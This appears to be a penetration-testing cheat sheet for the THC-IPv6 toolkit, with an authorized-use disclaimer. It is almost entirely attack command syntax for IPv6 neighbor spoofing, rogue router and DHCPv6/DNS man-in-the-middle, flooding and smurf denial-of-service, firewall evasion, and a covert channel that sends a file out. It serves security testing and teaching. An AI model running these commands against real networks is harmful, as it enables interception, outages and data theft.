← All cheat sheets

THC-IPV6

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

THC-IPv6 is a toolkit for attacking IPv6 and ICMP6 protocol
weaknesses. It includes dozens of tools for IPv6 reconnaissance,
man-in-the-middle attacks, denial of service, and exploitation
of IPv6-specific vulnerabilities.

RECONNAISSANCE TOOLS#

alive6 <interface>               # Detect alive IPv6 hosts on LAN
alive6 -l <interface>            # Passive host detection
detect-new-ip6 <interface>       # Monitor for new IPv6 hosts
passive_discovery6 <interface>   # Passive IPv6 host discovery
dnsdict6 <domain>                # IPv6 DNS dictionary brute force
dnsrevenum6 <dns> <ipv6_range>   # Reverse DNS enumeration

SCANNING TOOLS#

alive6 <interface>               # Send to all-nodes multicast
alive6 -p <interface>            # Ping sweep mode
alive6 -d <interface>            # DHCP discovery mode
dump_router6 <interface>         # Dump router advertisements
trace6 <interface> <target>      # IPv6 traceroute

MITM ATTACK TOOLS#

parasite6 <interface>            # ICMPv6 neighbor spoofing (ARP-like)
fake_router6 <interface> <prefix>
                                 # Fake Router Advertisement
fake_router26 <interface>        # Advanced fake RA
redir6 <interface> <src> <dst> <gw>
                                 # ICMPv6 redirect attack
fake_dhcps6 <interface> <dns>    # Fake DHCPv6 server
fake_dns6d <interface> <ip>      # Fake DNS server for IPv6

DOS ATTACK TOOLS#

flood_router6 <interface>        # Flood with Router Advertisements
flood_router26 <interface>       # Flood with RA (advanced)
flood_advertise6 <interface>     # Flood neighbor advertisements
flood_solicitate6 <interface>    # Flood neighbor solicitations
flood_dhcpc6 <interface>         # Flood DHCPv6 server
rsmurf6 <interface> <victim>     # Remote smurf attack
smurf6 <interface> <victim>      # Local smurf attack
kill_router6 <interface> <router>
                                 # Kill a router's route

EXPLOITATION TOOLS#

exploit6 <interface> <target> <exploit_id>
                                 # Run specific exploit
fuzz_ip6 <interface> <target>    # Fuzz IPv6 implementation
fuzz_dhcps6 <interface>          # Fuzz DHCPv6 server
implementation6 <interface> <target>
                                 # Test IPv6 implementation
implementation6d <interface>     # Implementation test (daemon)

FRAGMENTATION TOOLS#

fragmentation6 <interface> <target>
                                 # IPv6 fragmentation attacks
frag_id <interface> <target>     # Fragment ID prediction

FIREWALL EVASION#

firewall6 <interface> <target> <port>
                                 # Test firewall with IPv6 tricks
covert_send6 <interface> <target> <file>
                                 # Covert channel over IPv6
covert_send6d <interface>        # Covert channel listener

CONVERSION TOOLS#

address6 <mac>                   # Convert MAC to IPv6 link-local
address6 <ipv6>                  # Extract MAC from IPv6
thcping6 <interface> <src> <dst> # Custom ICMPv6 ping

EXAMPLES#

# Discover IPv6 hosts on local network
alive6 eth0

# Passive host discovery
detect-new-ip6 eth0

# DNS brute force for IPv6 records
dnsdict6 example.com

# Fake Router Advertisement MITM
fake_router6 eth0 2001:db8::/64

# Neighbor spoofing (like ARP spoofing)
parasite6 eth0

# Flood with Router Advertisements
flood_router6 eth0

# IPv6 implementation testing
implementation6 eth0 fe80::1

# Covert channel
covert_send6 eth0 <target> secret.txt

NOTES#

- Requires root privileges
- Most tools work on local LAN segment
- IPv6 attacks often bypass IPv4 security controls
- Many networks have IPv6 enabled but unmonitored
- Router Advertisements can hijack default routes
- Pair with Wireshark for traffic analysis
- Test in controlled environments only
- Useful for demonstrating IPv6 security risks